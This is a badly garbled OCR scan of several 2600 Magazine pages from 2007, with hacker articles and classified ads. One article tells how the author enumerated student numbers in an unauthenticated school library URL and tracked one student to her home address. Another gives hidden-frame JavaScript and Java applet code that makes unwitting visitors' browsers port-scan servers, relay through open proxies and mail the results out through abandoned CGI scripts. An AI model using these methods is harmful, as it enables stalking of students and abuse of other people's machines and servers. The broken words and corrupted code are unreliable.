Note: you wi l l have to modi fy the . xpi s l i ght l y
to make i t i nsta l l wi th FP 2 . 0. The steps on
how to do thi s are i n the fi rst comment of the
page.
- I nternet Expl orer XP I cons: http . l lww.
by val nour
Th i s arti cl e outl i nes a very s i mpl e hack
on a very promi nent techni cal school ' s
onl i ne l i brary. I t may sound l i ke gett i ng i nto
a school ' s l i bra ry i sn ' t that bi g a deal , but th i s
parti cul ar school ( and I ' m s ure many others
l i ke i t) requests that you i nput contact i nfor
mati on when l oggi ng i n to the system for the
fi rst ti me. Th i s al l ows a potenti al attacker to
gai n some sensi ti ve data on a student such as:
l ocati on of the school they attend, ful l name,
phone number (home and work), emai l
addresses, a n d i t al so al l ows you to change
passwords wi thout knowi ng the ol d one.
Procedure
When l oggi ng i nto thi s school ' s student
l i brary, you are prompted for you r username
and password. After provi di ng thi s you are
l ogged i nto the system. However, if you l og
i nto the school ' s student portal (wh i ch shows
school news and provi des a l i n k to the l i brary
and such) wi th your username and password,
then fol l ow the l i nk to the school ' s l i brary, a
compl etel y di fferent procedu re is fol l owed.
I nstead of l oggi ng i n wi th any sort of authen
ti cati on or checki ng sessi on I Ds or even
cooki es, i t j ust ta kes you to a URL structured
l i ke t hi s:
http . l l l ibrary . maj orschool . edu/portal .
"asp?pi=student#&role=student
Repl ace " student#" wi th, wel l , you r
student number and you have i nstant access.
No password checks or anyth i ng.
"bamm . gabriana . com/cgi-bin/download . pl l
"package/ ieiconsxp . xpi. An extensi on that
repl aces the Fi refox i cons wi th the ones used
by I E .
Confi gure Fi resomethi ng to change the
browser ti tl e from " Mozi l l a Fi refox" to " Mi cro
sof I nternet Expl orer. " FP shou l d now at l east
resembl e I E at a pass i ng gl ance and wi th
some tool bar and appearance tweaki ng on
your part, no teacher/admi ni strator wi l l spare
it a second gl ance.
Wi th your new ski l l s i n Network Ni nj i tsu,
no web fi l ter/fi rewal l wi l l stand a chance.
After I di scovered t hi s, I j ust start pl ug
gi ng i n di fferent numbers. I tri ed about ten
i n a l l and onl y found one other student. Now
I ' m s ure if I woul d have poked arou nd some
more I cou l d have found several others, but I
di dn' t want to rai se any suspi ci on. As far as
the other student I found, I was abl e to get
t hei r ema i l addresses, two phone numbers,
and fu l l name. I was abl e to l ocate her on
myspace wi th thi s i nformati on and was abl e
t o gather her home address after poki ng
around on Googl e wi th a l l the other i nfor
mati on I found. Now keep i n mi nd that thi s
school has upwards of 70 campuses i n the
Un i ted States. Th i s parti cul ar person was on
the west coast. I l i ve cl oser t o the east.
Concl usi on
Th i s promi nent techn i cal school , whi ch
even offers a cl ass enti tl ed "Securi ty Appl i
cat i ons of Common I T Pl atforms, " obvi
ousl y created a weak poi nt i n thei r onl i ne
resou rces. Thi s probl em was very s i mpl e, but
sti l l was abl e to gi ve enough i nformati on for
an attacker to gai n pl enty of ground i n very
l i tt l e t i me. Al l that was needed was an ei ght
di gi t, nonrandom number that cou l d eas i l y
have been soci al engi neered. I hope I have
gi ven enough i nformat i on to make thi s usefu l ,
especi al l y t o students at th i s school . But I al so
hope I have been vague enough so as to put
no one's personal data at r i sk.
Pge 54 2600 Magazine
Covert
Charrel
by OSI N
Thi s art i cl e i s a demonstrat i on on how var i ous types of communi cati on channel s can be
rendered i n unusual ways. I shoul d poi nt out that the purpose of wr i t i ng thi s art i cl e i s not to
i ntroduce worms, troj ans, or yet another vi rus, but to get you to vi ew tool s and techn i ques
i n a new manner, especi al l y i n ways they were never meant to be used. That bei ng sai d, I
wi l l fi rst spel l out how the actual mechani s m of sendi ng a message over the I nternet works.
Then I wi l l del ve i nto the detai l s and scri pts requi red to actual l y perform the task. But, you
shoul d real i ze that t hi s type of communi cati on i s not for t i me-sensi t i ve i nformat i on. I n some
ways these techni ques are somethi ng l i ke a " Poor Man ' s Tor. " For purposes of t hi s arti cl e I wi l l
assume the reader has some worki ng knowl edge of HTML codi ng wi t h I Frames, Javascri pt, and
J ava-to-Javascri pt communi cati on. Addi ti onal l y, the fu l l source code for the appl et and mai n
HTMUJ avascr i pt page wi l l be ava i l abl e at http://uk. geoci ti es. com/osi n 1 94 1 /app/app. html .
The way t hi s communi cati on scenar i o goes i s t hi s. Two peopl e i n di verse l ocat i ons need to
send messages to each other. For s i mpl i ci ty sake, thi s scenar i o takes i nto account one person,
Shemp, l eavi ng a text message somewhere out on the I nternet. The other person, Cur l y, wi l l
create a websi te that wi l l retri eve t he message from Shemp' s websi te. For thi s di scussi on both
websi tes wi l l be i n the same domai n, say for exampl e NyukNyukNyuk. You ' l l understand
l ater why havi ng t hat setup makes the communi cati on much easi er. Now, you may be aski ng
yoursel f, why does n' t Cur l y merel y vi si t Shemp' s websi te? I t cou l d be t hat both parti es do not
want to expose thei r brows i ng habi ts to t hei r I SP or to the NSA. And even i f they were us i ng
an anonymi zi ng system s uch as Tor, they mi ght get bl ocked by certai n countri es ' tyrann i cal
fi l ter i ng schemes, such as the Great Fi rewa l l of Chi na. So Cur l y' s websi te i s rea l l y the catal yst
whi ch ki cks off everyth i ng and th i s whol e scenar i o h i nges on Cur l y' s abi l i ty to attract an i nno
cent web vi ewer to vi ew hi s websi te.
Curl y wi l l create a web page whi ch wi l l consi st of two frames, a top and bottom frame. The
top frame wi l l show some i nnocuous i nformati on that the i n nocent web vi si tor wi l l see. Th i s
can be anyth i ng s o | don ' t show any ht ml code for top. html . The bottom frame i s where the
act i on wi l l take pl ace. The html code for the page that creates the frames l ooks l i ke t hi s :
index . html
<frameset rows=l O O % , O % >
<frame name= " top " src= " top . html" NORESIZE>
<frame name= " bottom" src= " bottom. html" NORESIZE>
</ frameset>
I t shou l d be obvi ous by now that the i nnocent web vi ewer i n most cases wi l l not even
real i ze there i s a bottom frame, but i t i s there even though we assi gned 1 00 percent of the
browser wi ndow to the top. I t i s i n that bottom frame where a l l the acti on takes pl ace.
Operation Moe
About ten years ago it was popu l ar for websi te desi gners to create l i ttl e cgi and perl test
scri pts to test sendi ng emai l s to an ema i l account. There used to be many of those scri pts out
on the I nternet but over ti me most di sappeared. But not a l l of them were del eted. Some have
been out there for years and they aren ' t bei ng moni tored. | personal l y know of at l east three
si tes that sti l l a l l ow you to pass text messages i n the URL of the http GET cal l . I was abl e to fi nd
them by usi ng Googl e' s advanced search sett i ngs. I won ' t gi ve the exact search cr i ter i a I used
because I don ' t want to start a spam attack, but i t shoul dn' t be that hard for you to fi gure out .
Sendi ng emai l th i s way i s not real l y har d. You j ust redi rect the bottom frame to the scr i pt ' s l oca-
Spring 2007 Pge 55
ti on, whi ch is usual l y an acknowl edgment page. Here' s the bi t of J avascr i pt code that is l oaded
by a cal l i n the body html tag when bottom. html i s l oaded, i . e. , <body onload= " dothis ( ) ; " >
function dothis ( ) {
I lchange the line below to whatever email script you are using .
var
Url= .. http : / /w. soredorain . com/rail . cgi ?nare=Sherp& sender=shemp@NyukNyukNyuk . com&
"recip=curly@NyukNyukNyuk. com& subj =My Message&text=Sherps % 3 2ressage% 3 2to% 32Curly " ;
this . docurent . location . href=url ;
But how does Shemp' s message actual l y get to Cur l y? Wel l , i n that case we' re goi ng to
use the I F rame tag. Let ' s say that Shemp has created an accou nt on NyukNyukNyuk under
hi s name and has pl aced a fl at text fi l e wi th the message " How dare you l ook l i ke someone
I hate! " Cur l y al so has a separate account on NyukNyukNyuk for h i msel f, but hi s homepage
i s the framed page di scussed above. He has "enti ci ng" vi sual and text ual i nformati on to l u re
someone to vi ew it whi ch ki cks off the J avascr i pt functi on. But fi rst, Cur l y has to make come
code changes. Here i s the I Frame code i n bottom. html :
<iframe
src= . http : / /w. NyukNyukNyuk . com/sherp/ressage txt "
nare= " test " onload= " dothis ( this ) ; " >
</iframe>
But Cur l y al so has to make some code changes to the Javascr i pt functi on doth i s. Us i ng a
search engi ne, Cur l y fi nds some code that wi l l basi ca l l y pu l l out the text (techni cal l y it pu l l s
out the html code) from the I Frame:
function dothis ( ifrare ) {
content= " " ;
if ( iframe . contentDocument )
content=i frame . contentDocument . body . innerHTML i
else if ( ifrare . contentWindow) {
content=iframe . contentWindow. document . body . innerHTML ;
} else if ( ifrare . docurent ) {
content=iframe . document . body . innerHTML i
content=content . substring ( S , content . length- 6 ) ;
url= .. http : / /www. soredorain . com/rail . cgi?nare=Sherp&sender=sherp@NyukNyukNyuk .
"cor&recip=curly@NyukNyukNyuk . com& subj =My
Message&text= " +content ;
this . document . location . href=ur1 i
One fi nal note about thi s techni que. As I s ai d ear l i er i t i s easi er i f both websi tes come
from the same domai n. By defau l t, most browsers prevent cross-si te scr i pt i ng across di ferent
domai ns . Th i s i s actual l y a good thi ng, but there' s nothi ng preventi ng a user from al l owi ng t hi s
i n thei r browser. So i n theory groups of peopl e worki ng together coul d set up a covert channel
by changi ng t he setti ngs i n t hei r browsers t o del i beratel y al l ow messages t o be sent from sepa
rate domai ns . Al so, expect the same message to be del i vered mul t i pl e ti mes.
Operation Larry
I know what you ' re th i nki ng. Cou l d the above techn i que work by sendi ng 64-bi t encoded
i mages? I n theory yes, but i n practi ce most l i kel y not. That ' s because a l ot of programmers
wi sel y l i mi ted the s i ze of the submi tted message i n t hei r scri pts. But that ' s not goi ng to
deter Shemp and Cur l y. They' ve thought of another way to communi cate: Java-to-Javascri pt
communi cati on.
Thi s next techni que has two requi rements but, bel i eve i t or not, i t ' s actual l y not i mpos
s i bl e to fi nd a websi te that ful fi l l s them. I n fact, I actual l y know of such a websi te, but I won ' t
menti on it s i nce they have been very good to me. Anyway, the requ i rements are these:
a. The websi te al l ows users to have accounts ( creati ng html pages and an em2 i l account) .
Pge .6 2600 Ma
g
azine
b. There is an SMTP server and HTML webserver run n i ng on the same machi ne.
For those of you who are not J ava programmers, an appl et normal l y cannot open a network
connecti on. But there i s one speci al case i n whi ch an appl et can: when i t' s communi cati ng
back to the server from whence i t came. And i n that case i f there i s a server l i steni ng on any
port, i t can normal l y make a connecti on t o i ts server of ori gi n and that port. For the purposes
of thi s demonstrati on i t i s assumed the SMTP server rel ays messages to Cur l y' s emai l account
of the same domai n.
Cur l y wi l l be the one who wi l l have t o i mpl ement the J ava-J avascr i pt communi cati ons.
Basi cal l y, J avascr i pt communi cates t o J ava by cal l i ng one of the J ava methods of an appl et:
this . document . applets [ O ) . sendEmail ( message ) ;
I n thi s case the method sendEma i l is a J ava method that performs the cal l to the SMTP
server. On the other s i de, J ava can communi cate wi th J avascr i pt methods, but we have to set
up some speci al secti ons in the J ava code that is not normal l y needed for an ordi nary appl et.
The fi rst i s that we must i mport the cl ass that al l ows an appl et to cal l J avascri pt. That l i ne i s
added t o t he J ava code then recompi l ed:
import netscape . j avascript . * ;
I n most cases, especi al l y i n Wi ndows machi nes, the netscape. j avascr i pt cl asses resi de i n
the pl ugi n. j ar fi l e. When you compi l e your appl et you may have to speci f the - cl asspath
opti on i n order to compi l e the J ava code. Anyway, to use the cl ass we must create a new
J SObj ect cl ass:
JSObj ect win=JSObj ect . getWindow( this ) ;
Then from our appl et we can cal l any J avascr i pt functi on i n our page l i ke so:
win . call ( " dothis " , null ) ;
Thi s wou l d cal l a Javascr i pt functi on cal l ed doth i sO wi th no var i abl es passed to the func
t i on. As a si de note, the n u l l i s actual l y a pl ace hol der. That pl ace i s usual l y reserved for a
Str i ng array to pass var i abl es i nto the J avascr i pt functi on, but that functi onal i ty is beyond the
scope of thi s arti cl e.
But we must al so pass parameters t o thi s appl et i n order for i t t o r un correctl y. Let ' s say
Cur l y wants the opti on of ei ther havi ng Shemp' s message sent to h i m vi a a scri pt as we di d i n
Operati on Moe, or sendi ng i t by connecti ng t o port 2 5 of our server of or i gi n and sendi ng the
message manual l y so that the appl et does n' t have to be recompi l ed. Here i s an exampl e of
how appl et parameters are defi ned for Cur l y' s appl et:
<applet code=" app . clas s " width=1 height=1>
<param name=" helo_line" value= " helo NyukNyukNyuk . com" >
<param name=" server" value=" l O . O . O . l " >
<param name= " smtpyort " value= " 2 5 " >
<param name= " from_email "
value=" shemp@NyukNyukNyuk . com" >
<param name= . . to_email .. value= .. curlY@NyukNyukNyuk. com .. >
<param name=lI subj ect " value=" MY Mes sage to You" >
<param name=" email_mode ll value= " homeserver" >
</ applet>
Most of the parameters are sel f expl anatory, but I shoul d expl ai n a few of them. The hel o_
l i ne parameter is needed because some SMTP servers requi re a hel o cal l before they wi l l al l ow
you to send ema i l t hrough them. You may have to pl ay wi th that parameter i n order to get the
appl et to work correctl y wi th the server of ori gi n. The " server" parameter i s the server of or i gi n ' s
I P. And fi nal l y emai Lmode i nstructs the appl et on whi ch method i t shoul d use to send Shemp' s
message. The " homeserver" mode tel l s t he appl et t o make a connecti on back t o port 2 5 of
the " server" I P and send it to the user defi ned i n "to_emai l " , i n thi s case a val i d ema i l account
for the doma i n of the servi ci ng SMTP server. The other opti on of emai l _mode is " scri pt " . Thi s
i nstructs t he appl et t o cal l a J avascr i pt functi on and send t he emai l vi a t he techni que i ntro
duced in Operati on Moe. Reca l l that the message i tsel f is retri eved by the I Frame in bottom.
html and i s n ' t defi ned as an appl et parameter. I t i s al ready defi ned by t he "content" var i abl e.
Prameters for an appl et are retr i eved usi ng the getPrameter method for appl ets. So we
wou l d gr ab one of the parameters defi ned on t he html page l i ke thi s:
String email mode=getParameter ( . . email mode " ) ;
Note that you must pass the getParameter method the same name i n your J ava code as
you di d i n the html code. And here i s the s ni ppet of code i n the J ava appl et that sends the
Spring 2007 Pge 57
message:
public void sendEmail ( String message )
if ( email_mode . equals ( " script " {
I l if email mode is by script , call the Javascript func
sendContentOverWeb ( )
I ithis is the Javascript method that calls the cgi
email script
I i note that ' message ' is already available to the
Javascript function
System. out . println ( " Calling method
sendContentOverWeb " ) ;
win . call ( " sendContentOverWeb" , null ) ;
} else
I lelse send by opening a network connection back to
server we came
System. out . println ( " Calling server " +server ) ;
String inline=" " ;
String outline= " " ;
try {
InetAddress addr =
InetAddress . getByName ( server ) ;
Socket sock = new Socket ( addr , smtp-Fort ) ;
BufferedReader in=new BufferedReader ( new
InputStreamReader ( sock . getInputStream( ) ;
BufferedWriter out=new BufferedWriter ( new
OutputStreamWriter ( sock . getOutputStream( ) ;
I lread in server ' s welcome
inline=in . readLine ( ) ;
I lwrite out helo line
out . write ( helo_line+ " \ n " ) ;
out . fush ( ) ;
I lread in server response
inline=in . readLine ( ) ;
out . write ( " mail from: " +from_email+ " \ n " ) ;
out . fush ( ) ;
inline=in . readLine ( ) ;
out . write ( " rcpt to : " +to_email+ " \ n " ) ;
out . fush ( ) ;
inline=in . readLine ( ) ;
out . write ( " data " + " \ n " ) ;
out . fush ( ) ;
I lwrite out the message
out . write ( message+ " \ n" ) ;
out . fush ( ) ;
out . write ( " . \ n " ) ;
out . fush ( ) ;
I lread in server response
inline=in . readLine ( ) ;
out . write ( " quit\ n " ) ;
out . fush ( ) ;
sock . close ( ) ;
} catch ( Exception e ) { System. out . println ( " SMTP
Error : " +e ) ; }
As you can see, i f the homeserver has an SMTP server runni ng on i t, there i s the poss i bi l i ty
that an appl et cou l d ut i l i ze i ts servi ces, whi ch i s why i t i s general l y not a good i dea to run an
SMTP server on t he same mach i ne as the webserver. But Cur l y has one more zany ant i c up
hi s sl eeve.
Page 58 2600 Magazine
Operation Cheese
Gett i ng back to the story, every now and then Cur l y forgets or makes a mi stake and enters
the wrong port number for the SMTP server i n the appl et ' s parameters. What he fi nds i s that the
appl et throws an excepti on and fai l s to make a connect i on s i nce that erroneous port i s natu
ral l y cl osed. Then he begi ns to wonder, " Can the repl i cati on of fai l u re actual l y gi ve an i ndi ca
t i on of what ports are open on the server of ori gi n? " So, he deci des to add an appl et parameter
cal l ed " appl et_mode" whi ch wi l l a l l ow h i m to test hi s theory. I f the appl et i s i n "smtp" mode,
i t does i ts nor mal emai l i ng procedu res as di scussed i n Operat i ons Moe and Larry. But i f i t i s
i n " nmap" mode, t he appl et wi l l try t o open a seri es of ports and ema i l what ports were found
open t o hi m. Si nce we al ready know t hat an appl et can onl y communi cate back t o t he server
of ori gi n and that parameter i s al ready defi ned, Cur l y must create two more parameters cal l ed
" start_port" and "end_port" . And he must create another method i n hi s J ava code to perform
thi s functi on:
public void doNrap ( )
openports= " The following ports are open on " +server+ " :

;
for ( int i=start-port ; i<end-port ; i++ ) {
try
InetAddres s addr = InetAddres s . getByNare ( server ) ;
Socket sock = new Socket ( addr , proxy-port ) ;
I l if this port is open , an exception will not be
thrown and
l ithe following code will be executed
openports+=i+ " " ;
} catch ( Exception re ) { }
} l lend for loop
sendErail ( openports ) ;
}
Si nce Cur l y knows t hat a J ava appl et wi l l even bypass a Tor connecti on and expose hi s real
I P havi ng an i nnocent vi ewer runni ng thi s code on thei r machi ne us i ng the methods di scussed
previ ousl y i s cri ti cal .
B u t l et ' s say that i n the process of ru nni ng hi s appl et i n " nmap" mode Cur l y di scovers that
port 3 1 28 is open on the server of or i gi n ! How conven i ent. For those of you who a re unfami l i ar
wi t h squi d, i t i s a proxy server that l i stens by defaul t on port 3 1 28. So Cur l y deci des t o add a
thi rd mode to hi s appl et: http. I n t hi s mode the appl et makes a cal l to port 3 1 2 8 and, assumi ng
the proxy is an open proxy server, it retri eves whatever web page Cur l y desi res and emai l s
the html code of the request back to hi m. I n fact, why not have a l i st of URLs t o pass off t o the
appl et? Fi rst Cur l y creates another appl et parameter:
<parar nare= " http_request_list " value= ' http : / /www. google . com http : / /ww. geocities .
"cor http : / /www. 2 6 0 0 . com >
Note that each URL is separated by " I " . Then he must update hi s j ava code. The doHttpO
method of hi s J ava appl et i s a near l y exact repl i ca of the doSmtpO method, except t he i nput
and output l i nes are di fferent:
out . write ( " GET " +url + " HTTP/ 1 . 1 \ n " ) ;
out . write ( " \n " ) ;
out . fush( ) ;
while str=in . readLine ( ! =nul l ) {
url_code+=str ;
Then a l l the doHttp method has to do i s cal l the sendEma i l method and pass the ur i _code
val ue to be emai l ed to Cur l y by whatever emai l mode i s defi ned i n the appl et parameters of
bottom. htm! . So, to end the story, the appl et has three modes: smtp, nmap, http, and now the
punch l i ne, Moe, Lar ry, the Cheese!
Spring 2007Pge 59
How to
cripple "
by comfreak
comfreak@gmai l .com
Watchi ng cabl e news i n October I saw
the story of J oseph Duncan, a man who
confessed to the murder of two adu l ts and a
teenager i n I daho. For more i nfo see Googl e
News and have yoursel f a merry t i me
searchi ng. However, the crux of the story
caught me when I heard the FBI had hi s
l aptop and cou l d not crack t he encrypti on
wi thout hi s password. The news reporter
asked ai ml ess questi ons such as "How hard
is it to encrypt l aptop?" and "Why i s the
F BI havi ng such a hard ti me cracki ng thi s
l aptop?" Of course, news commentators are
cl uel ess on how easy it is to encrypt a dri ve
and subsequentl y l eave even the federal
government apparent l y hel pl ess.
I t got me wonder i ng j ust what ki nd of
encrypti on thi s mi ght be that the FBI went
publ i c wi th the i nformat i on. Sur el y they
woul d not want to embarrass themsel ves
unl ess they trul y needed thi s guy to gi ve up
hi s password. I heard on t he s ame TV program
one of the offi cers garbl e somethi ng about
"I t's cal l ed Pretty Good Program. " I assume
he i s speaki ng of PGP ( Pretty Good Pri vacy
at pgpi . org) so i t j ust got me thi nki ng more
and aski ng some quest i ons. Can i t real l y be
j ust that s i mpl e to encrypt fi l es beyond the
power of the federal government? I f i t real l y
i s s o strong beyond t he cracki ng power
of the FBI , then cl ear l y a l l secur i ty comes
down to the qual i ty of your password.
The commerci al versi on of PGP features
an opt i on to encrypt an enti re dri ve or
create an encrypted vi rt ual dri ve wi th i n
your dri ve. That makes i t very easy to keep
an encrypted secti on and j ust send thi ngs
that are of a "sensi ti ve" nature to i t. I t cou l d
be t he onl y thi ng between you and a j ai l
cel l dependi ng on your speci fi c i ssue wi th
Pge 60
the l aw.
Whether the federal government can
crack i t or not doesn't matter i f your pass
word i s someth i ng s i mpl e l i ke "fl ufy" or
" 1 ZJ4. Perhaps someth i ng more obvi ous
l i ke your i n i t i al s or your ki ds name(s) . For
further i l l ustrati on of the absurdi ty of peopl e's
passwords I ' l l poi nt to a fami l y member of
mi ne who shal l remai n namel ess. They use
the same password for everythi ng from t hei r
emai l t o t hei r fi nanci al data t o thei r Wi ndows
password. The punch l i ne comes i n the fact
that the same password phrase i s al so used
as thei r l i cense pl ate number. I cou l dn't make
that up if I tri ed.
. .
The bottom l i ne I found from thi S story I S
t hat you real l y need t o t ake passwords seri
ousl y. Unfort unatel y most peopl e don't l i ke to
wri te down/remember more than one or two
s i mpl e passwords. Of course, if for "some"
reason you fi nd yoursel f i n a si tuati on where
you wi s h you set better passwords, it wi l l be
too l ate. For exampl e, l et's say you fi nd your
sel f on the wrong si de of the l aw and some
computer equi pment i s sei zed .
.
Perhaps th

re
i s " i nformat i on" on t hat equ i pment whi ch
cou l d get you i n more "troubl e. " You coul d
end up compoundi ng a s i mpl e probl

m.
However, i f you are us i ng strong encrypt i on
and a str i ng of tough passwords, you wi l l be
safe. I f thi s l aptop sent to the FBI i s secure,
your l ocal cr i me l ab wi l l be even more
hel pl ess.
There are some excel l ent password gener
ators I found j ust doi ng a s i mpl e search:
ww. winguides . com/ security/password . php
w. randpass . com
More advanced generators and downl oad
abl e programs:
w. mark . vcn . com/password/
w. grc . com/passwords . htm
2600 Magazine
HOPE FORUMS
Announci ng a brand new way to communi cate your thoughts
and ideas about the HOPE conferences, 2600, and hacker
i ssues!
Si mpl y go to http: //tal k. hope. net and joi n the fun! We al ready
have many l i vel y di scussi ons i n progress and you can start
your own if you feel the need. The forum focuses mai nly on
the past and future Hackers On Pl anet Earh conferences and
the current battl e to hel p save the Hotel Pennsyl vani a, si te of
HOPE.
Regi strati on i s si mpl e, qui ck, and free! See what happens when
we al l put our heads together.
OFF TH E H
Tac o' ogyf|
acka| Pa|sa t|
KLPLLP |LK PLLm L WLKLL
Wednesdays, 1 900- 2000 L
WBAI 99 . 5 M, New York Ci ty
WBCQ 741 5 Khz - shorwave to North Ameri ca
and at http : //www. 2600 . com/offthehook over the net
Cal l us duri ng the show at + 1 2 1 2 209 2900 .
Emai l oth@2600. com wi th your comments.
And yes, we are i nterested i n si mul casti ng on other stati ons or
vi a satel l i te. Contact us i f you can hel p spread " Off The Hook" to
more l i steners !
Spring 2007Pge 61
Happenings
CAROLINACON wi l l begin Friday, April 20th and wrap up Saturday
ni ght, April 21 st. This year's event wi l l be held at the Holiday I nn in scenic
Chapel Hill, North Carolina ( 1 301 N. Fordham Blvd.). The conference
i s a great way to meet other l i ke-mi nded technology enthusiasts and
to knowledge-share with your peers, There i s a lot of opportunity for
both learning and soci al i zi ng. I n many ways, Carolinacon i s l i ke a whol e
semester of college, al l i n one weekend. For more details, vi si t www.
carolinacon.org.
CHAOS COMMUNICATION CAMP Z 7. Thi s event will star August
8th and last unti l August 1 2th, 2007. That's right, ladies and gentlemen,
We are goi ng for five days thi s ti me! The Camp wi l l take place at a
brand new location at the Airport Museum in Finowfurt, directly at Finow
airport. So if you like, you can directly fl y to the Camp. You can get to
the location easily with a car i n less than 30 mi nutes starting i n Berl i n
and we wi l l make sure there i s a shuttle connection to the next train
station. The coordinates of the location are 52. 831 7, 1 3.6779. More
details at ecc.de.
HITBSECCONF - MALAYSIA i s the premier network securi ty event for
the regi on and the largest gatheri ng of hackers i n Asia. Our 2007 event
i s expected to attract over 700 attendees from around the world and
will see 4 keynote speakers i n addition to 40 deep knowledge technical
researchers. The conference takes place September 3rd through
September 6th i n Kuala Lumpur, The Cal ! For Papers i s open unti l May
1 st. More details at http://eonference.hi tb. org/hitbsecconf2007kll.
I LLUMINATING THE BLACK ART OF SECURIT. Announci ng SecTor
- Security Education Conference Toronto - November 20-21 , 2007.
Bri ngi ng to Canada the worl d' s brightest (and darkest) mi nds together
to identify, discuss, dissect, and debate the latest di gital threats facing
corporations today. Unique to central Canada, SecTor provides an
unmatched opporuni ty for IT professionals to col l aborate with thei r
peers and learn from thei r mentors. Al l speakers are true security
professionals with depth of understanding on topics that matter. Check
us out at www.seetor.ca to see the impressive growing list of speakers
and be sure to sign up for email updates. Attendees and Sponsors -
don' t miss out, both are l i mited!
For Sale
VENDING MACHI NE JACKPOTTERS. Go to www.hackershomepage.
com for EMP Devices, Lock Pi cks, Radar Jammers & Controversial
Hacking Manual s. 407-965-5500
MAKE YOUR SOFTWARE OR WEBSITE USER FRI ENDLY with
Foxee, the friendly and interactive cartoon bl ue fox! Not everyone
who wi l l navigate your website or software application will be an
expert hacker, and some users will need a iittle help! Foxee is a hand
animated Mi crosoft Agent character that will accept i nput through voice
commands. text boxes, or a mouse, and interact with your users through
text, animated gestures, and even di gital speech to hel p guide them
through your software with ease! Foxee supports 10 spoken languages
and 31 written languages. She can be added to your software through
C++, VB6, al l . Net languages, VBScript, JavaScript, and many others!
Natively compati ble with Mi crosoft Internet Explorer and can work with
MozHla Firefox when used with a free pl ug-i n. See a free demonstration
and purchasing information at www.foxee.net!
TV-B-GONE. Turn off Ts i n public places! Airports, restaurants, bars,
anywhere there' s a 1 See why everyone at HOPE Number Si x loved i t.
Turning oft TVs really i s fun. $20. 00 each. www.TBGone.com
JUST RELEASED! Feel i ng tired during those late ni ght hacking
sessions? Need a boost? If you answered yes. then you need to
reenergize with the totally new HackMusic vO/ume l CO. fhe CD i s
crammed wi th hi gh energy hack musi c to get you back on track. Order
today by sending your name, address, city, state, and zip along with
$1 5 to: Doug Talley, 1 234 Birchwood Dri ve, Monmouth, I L 61 462. Thi s
CD was assembl ed sol el y for the readers of 200and i s not avai l abl e
anywhere else!
NET DETECTIVE. Whether you' re just curi ous, trying to locate or fi nd
out about people foT' personal or busi ness reasons, or you' re looki ng
for people you' ve falien out of touch wi th, Net Detective makes i t al l
possi ble! Net Detecti ve i s used worldwide by pri vate investigators and
detectives, as wel l as everyday people who use it to fi nd lost relatives,
ol d high school and army buddi es, deadbeat par(nts, lost loves, people
that owe them money, and just pl ai n ol d snooping around. Visit us today
at www.netdetecti ve. org. uk.
JEAH.NET SHELLS/HOSTING SI NCE 1999* JEAH' s FreeBSD shel l
accounts conti nue to be the choi ce for unbeatabl e upti me and the
largest virtual host l i st you' n fi nd anywhere. JEAH lets you transfer/store
fi les, I RC, and emai l with complete privacy and security. Fast, stable
virtual web hosting and completely anonymous domai n registration
solutions also available with JEAH. As always, mention 200 and your
setup fees are waived! Join the JEAH. NET i nsti tuti on!
NETWORKI NG AND SECURITY PRODUCTS available at
OvationTechnology.com, We' re a suppl ier of Network Security and
Internet Pri vacy products. Our onl i ne store features VPN and firewall
hardware, wireless hardware, cable and DSL modems/routers, IP
access devices. VolP products, parental contrl products, and ethernet
switches. We pride ourselves on providing the highest level of technical
expertise and customer satisfaction. Our commitment to you ... No
surprises! Buy with confidence! Security and Privacy i s our business!
Visit us at http://www.OvationTechnology.com/store.htm.
PHONE HOME. Tiny, sub-miniature, 7/1 0 ounce, programmable/
reprogrammable touch-tone, multi-frequency (DTMF) di al er which can
store up to 15 touch-tone di gits. Uni t i s hel d against the telephone
receiver' s microphone for dialing. Press " HOME" to automatically dial
the stored di gits whi ch can then be heard through the ultra mi ni ature
speaker. Ideal for E. T' s, chi ldren, Alzheimer victims, lost dogs/chi mps,
significant others, hackers, and computer wizards. Gi ve one to a
boy/girl friend or to that potential "someone" you meet at a party, the
supermarket, school, or the mal l ; with your pre-programmed telephone
number, he/she wi l l always be abl e to cal l you! Also, ideal i f you don' t
want to " disclose" your telephone number but want someone to be able
to cal! you locally or l ong distance by telephone, Key ri ng/cli p. Limited
quantity available. Money order only. $24,95 + $3.00 S/H, Mai l order to:
PHONE HOME, Nimrod Division, 331 N. New Ballas Road, Box 41 0802,
CRC, Missouri 631 41 .
REAL WORLD HACKING: Interested i n rooftops, steam tunnel s, and
the l i ke? Read the al l -new ACCeSS A0AaS, a guidebook to the art of
urban exploration, from the author of /n/i/tratiOnzi ne. Send $20 postpaid
i n the US or Canada, or $25 overseas, to PO Box 1 3, Station E, Toronto,
ON M6H 4E1 , Canada, or order online at www.infiltration.org.
ENHANCE OR BUI LD YOUR LIBRARY wi th any of the following CD
ROMS: Hack Attacks Testi ng, Computer Forensics, Master Hacker,
Web Spy 2001 , Hackers' Handbook, Troubleshooting & Diagnostics
98, PC Troubleshooter 2000, Forbidden Subjects 3, Hackers Tool ki t
2. 0, Steal Thi s CD, Hacks &Cracks, Hackerz Kroni ckl ez, El i te Hackers
Tool ki t 1 , Forbidden Knowledge 2, Troubleshooti ng &Diagnostics 2002,
Pol i ce Cal l Frequency Gui de 2nd Edi ti on, Computer Toybox, Answering
Machine 2000, Hackers Encyclopedia 3, Maximum Security 3rd Edi ti on,
Network Uti l ities 200 1 , Screensavers 2002, Engi neering 2000, Anti
Hacker Tool ki t 2nd Edi ti on & PC Hardware, Send name, address, ci ty,
state, zi p, emai l address (for updates only) and items ordered, al ong
with a cashi er' s check or money order i n the amount of $20 tor each
item to: Doug Talley, 1 234 Birchwood Drive, Monmouth, IL 61 462.
FHEEDOM DOWN7lME ON DVD! Years i n the maki ng but we hope
it was worth the wai t. A doubl e DVD set that i ncl udes the two hour
documentary, an in-depth interview wi th Kevi n Mi tni ck, and nearly
three hours of extra scenes, lost footage, and mi scell aneous stuff. Pl us
capti oni ng for 20 (that' s ri ght, 20) l anguages, commentary track, and a
lot of thi ngs you' l l just have to find for yourself! The entire two disc set
can be had by sendi ng $30 to Freedom Downtime DVD, PO Box 752,
Mi ddl e I sl and, NY 1 1 953 USA or by orderi ng from our onl i ne store at
http://store. 2600. com. (VHS copies of the fi l m sti l l available for $1 5. )
CAP' N CRUNCH WHISTLES. Brand new, onl y a few left. THE
ORI GI NAL WHI STLE i n mi nt condi ti on, never used. Joi n the elite few
who own this treasure! Once they are gone, that i s it - there are no
more! Keychai n hol e for keyri ng. Identify yoursei f at meeti ngs, etc. as
a 200 member by dangl i ng your keychain and s8)ing nothi ng. Cover
